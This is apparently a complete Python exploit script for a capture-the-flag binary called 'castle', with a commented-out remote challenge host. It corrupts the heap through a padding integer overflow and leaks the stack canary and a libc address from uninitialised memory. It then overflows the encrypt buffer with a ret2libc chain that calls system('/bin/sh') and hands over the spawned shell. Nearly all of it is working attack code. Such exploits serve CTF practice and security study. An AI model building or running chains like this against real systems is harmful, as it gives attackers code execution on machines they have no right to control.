import re

from Pwn import *
# Process/connection handle shared by every helper below.  The default
# line drives the local './castle' binary; the commented alternative
# points at the live challenge host (castle.svattt.org:31330).  Note that
# the libc offsets hard-coded in exploit() were taken from one specific
# libc build and are only valid for whichever target they were derived on.
p = Pwn(elf='./castle')
# p = Pwn(elf='./castle',host='castle.svattt.org',port=31330)
def go_up_set_key(user_key):
    """Menu option 'w': install *user_key* as the binary's current key.

    Waits for the 🔥 menu prompt, selects "up", then reads until either the
    🗝 key prompt or the string 'detected.' arrives (read_utils is a Pwn
    helper; presumably it stops at whichever marker shows up first - verify
    in the Pwn module).  When 'detected.' is seen the script reports heap
    corruption and sends nothing further; otherwise the key is sent.

    Returns True if the key was sent, False if the corruption notice came
    back instead.  Note that exploit() deliberately relies on the False
    path on its second call.
    """
    p.read_until('\xF0\x9F\x94\xA5')  # UTF-8 bytes of the 🔥 menu prompt
    p.sendline('w')
    reply = p.read_utils('\xf0\x9f\x97\x9d :', 'detected.')
    corrupted = 'detected.' in reply
    if corrupted:
        print('[+] Heap Corrupted')
    else:
        p.sendline(user_key)
    return not corrupted
def go_right_decrypt(enc, key=''):
    """Menu option 'd': ask the binary to decrypt the hex ciphertext *enc*.

    If *key* is non-empty the 🗝 key prompt (or a 'detected.' notice) is
    consumed and the key sent first; this is needed when no key is installed.
    The binary's reply is read through the 😱 marker and scanned for runs of
    lowercase hex digits.  Ordinary words in the reply also match
    `[0-9a-f]+` (e.g. "a", "de"), so the fifth run is the one treated as the
    plaintext hex - an index that appears to have been picked empirically
    against the real output.

    Returns that hex string, or None when fewer than six runs were found.
    """
    p.read_until('\xF0\x9F\x94\xA5')  # 🔥 menu prompt
    p.sendline('d')
    if key:
        p.read_utils('\xf0\x9f\x97\x9d :', 'detected.')  # 🗝 key prompt or corruption notice
        p.sendline(key)
    p.read_until(' b\xc3\xaan ph\xe1\xba\xa3i:')  # " bên phải:" - Vietnamese "right side:"
    p.sendline(enc)
    reply = p.read_until('\xf0\x9f\x98\xb1')  # read through the 😱 marker
    hex_runs = re.findall(r'([0-9a-f]+)', reply)
    return hex_runs[4] if len(hex_runs) > 5 else None
def go_left_encrypt(msg, key=''):
    """Menu option 'a': ask the binary to encrypt the plaintext *msg*.

    Mirror image of go_right_decrypt(): optionally answers the 🗝 key prompt
    with *key*, sends *msg* at the " bên trái:" ("left side:") prompt, reads
    through the 😱 marker and extracts runs of lowercase hex digits from the
    reply.  Because plain text in the reply also matches `[0-9a-f]+`, the
    fifth run is taken as the ciphertext (index chosen to fit the real
    output, not derived from any documented format).

    Returns the ciphertext hex string, or None when fewer than six runs
    were found.
    """
    p.read_until('\xF0\x9F\x94\xA5')  # 🔥 menu prompt
    p.sendline('a')
    if key:
        p.read_utils('\xf0\x9f\x97\x9d :', 'detected.')  # 🗝 key prompt or corruption notice
        p.sendline(key)
    p.read_until(' b\xc3\xaan tr\xc3\xa1i:')  # " bên trái:" - Vietnamese "left side:"
    p.sendline(msg)
    reply = p.read_until('\xf0\x9f\x98\xb1')  # read through the 😱 marker
    hex_runs = re.findall(r'([0-9a-f]+)', reply)
    if len(hex_runs) <= 5:
        return None
    return hex_runs[4]
def go_down_release_key():  # free
    """Menu option 's': release the currently installed key.

    The original author's "free" note suggests this path frees the key
    buffer on the heap - not verifiable from this script.  Nothing is read
    back after the command, and exploit() below never calls this helper.
    """
    menu_prompt = '\xF0\x9F\x94\xA5'  # UTF-8 bytes of the 🔥 menu prompt
    p.read_until(menu_prompt)
    p.sendline('s')
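def _trigger_heap_corruption(key):
    """Step 1: corrupt the heap so the next set_key() goes through corrupted().

    Installs *key*, encrypts a block of 'A's, then feeds the ciphertext back
    with its last byte (two hex digits) replaced.  Per the original analysis
    this makes the binary's unpad length computation overflow ("unpad int
    overflow") and corrupts the heap.

    Raises RuntimeError if the key could not be installed or no ciphertext
    came back (previously a None slipped into len() and crashed with
    TypeError).
    """
    if not go_up_set_key(key):
        raise RuntimeError('initial set_key already reported corruption; '
                           'the process is not in the expected fresh state')
    enc = go_left_encrypt('A' * 64)
    if not enc:
        raise RuntimeError('could not obtain a ciphertext to tamper with')
    # Clobber the final ciphertext byte; the bad padding is what upsets unpad.
    go_right_decrypt(enc[:-2] + 'AA')


def _leak_stack(key):
    """Step 2: pull raw stack bytes out of the binary via decrypt().

    The second set_key() call is expected to answer 'detected.' - that is
    the detection path which calls corrupted() - so its False return is
    not an error.  Original author's reasoning: corrupted() has a smaller
    frame than encrypt() and is entered from set_key(), so encrypt()'s
    stack cookie may be left lying in memory that is later re-used.

    Then a 257-byte message is encrypted so the resulting hex string has odd
    length; per the same analysis the binary's hexdecode fails on that and
    leaves stack memory uninitialised, which decrypt() echoes back (canary,
    a libc pointer, heap data).

    Returns the decoded leak bytes.  Raises RuntimeError when encrypt or
    decrypt gave nothing, the hex is malformed, or the leak is too short
    for the offsets exploit() reads.
    """
    go_up_set_key(key)  # 'detected.' / False is the expected outcome here
    enc = go_left_encrypt('A' * 257, key)
    if not enc:
        raise RuntimeError('encrypt returned no ciphertext; cannot set up the leak')
    leak_hex = go_right_decrypt(enc)
    if not leak_hex:
        raise RuntimeError('decrypt returned no data; stack leak failed')
    try:
        leak = leak_hex.decode('hex')
    except (TypeError, ValueError):
        raise RuntimeError('leaked hex string is malformed: %r' % leak_hex)
    if len(leak) < 92:
        raise RuntimeError('leak is only %d bytes; need at least 92 to read '
                           'the canary (64..68) and libc pointer (88..92)' % len(leak))
    return leak


def _build_rop(canary, system, bin_sh):
    """Step 3: build the ret2libc chain laid over encrypt()'s stack frame.

    Layout follows the frame sketch from the original analysis (buffer,
    canary, saved ebp, return address):
    canary | junk ebp | system() | junk return address for system | "/bin/sh".
    """
    return p.pA(
        canary,
        0x41414141,  # saved ebp - any value
        system,
        0x41414141,  # where system() would return - never reached
        bin_sh,
    )


def _send_overflow(payload):
    """Step 4: push the chain through the encrypt ('a') input path.

    The payload is hex-encoded twice and padded to 512 bytes, exactly as in
    the original script; presumably the binary hex-decodes the input once
    before copying it into encrypt()'s stack buffer - TODO confirm against
    the binary.  go_left_encrypt() is not used here because it waits for
    the 😱 reply, which never arrives once the chain is executing.
    """
    data = payload.encode('hex').encode('hex').ljust(512, 'A')
    p.read_until('\xF0\x9F\x94\xA5')  # 🔥 menu prompt
    p.sendline('a')
    p.read_until(' b\xc3\xaan tr\xc3\xa1i:')  # " bên trái:" prompt
    p.sendline(data)


def exploit(leak_offset=0x6a47b, system_offset=0x3ada0, binsh_offset=0x15b82b):
    """Run the full chain: corrupt the heap, leak canary + libc, ret2libc.

    Parameters (all libc-build specific; the defaults are the values the
    author used and are only valid for that one libc):
      leak_offset   - distance from the leaked pointer at leak[88:92] to the
                      libc base.
      system_offset - offset of system() from the libc base.
      binsh_offset  - offset of the "/bin/sh" string from the libc base.
    Re-derive all three when targeting a different build (e.g. the remote
    host), otherwise the final chain jumps into garbage.

    Raises RuntimeError from the helpers when an intermediate step does
    not yield the data the next step needs.
    """
    p.connect()
    raw_input('>')  # pause so a debugger can be attached before anything is sent
    key = 'FEEDDEAD' * 4

    _trigger_heap_corruption(key)
    leak = _leak_stack(key)

    # Positions 64 and 88 are where the author found the canary and a libc
    # pointer inside the leaked frame; they are layout-specific.
    canary = p.unpack(leak[64:68])
    libc = p.unpack(leak[88:92]) - leak_offset
    system = libc + system_offset
    bin_sh = libc + binsh_offset
    print('Canary: %s' % hex(canary))
    print('Libc: %s' % hex(libc))
    print('system(): %s' % hex(system))
    print('"/bin/sh": %s' % hex(bin_sh))

    _send_overflow(_build_rop(canary, system, bin_sh))
    p.io()  # hand the (hopefully) spawned shell over to the user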
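# Only fire the exploit when run as a script, so the helpers can be imported
# (e.g. for interactive poking) without immediately connecting to the target.
if __name__ == '__main__':
    exploit()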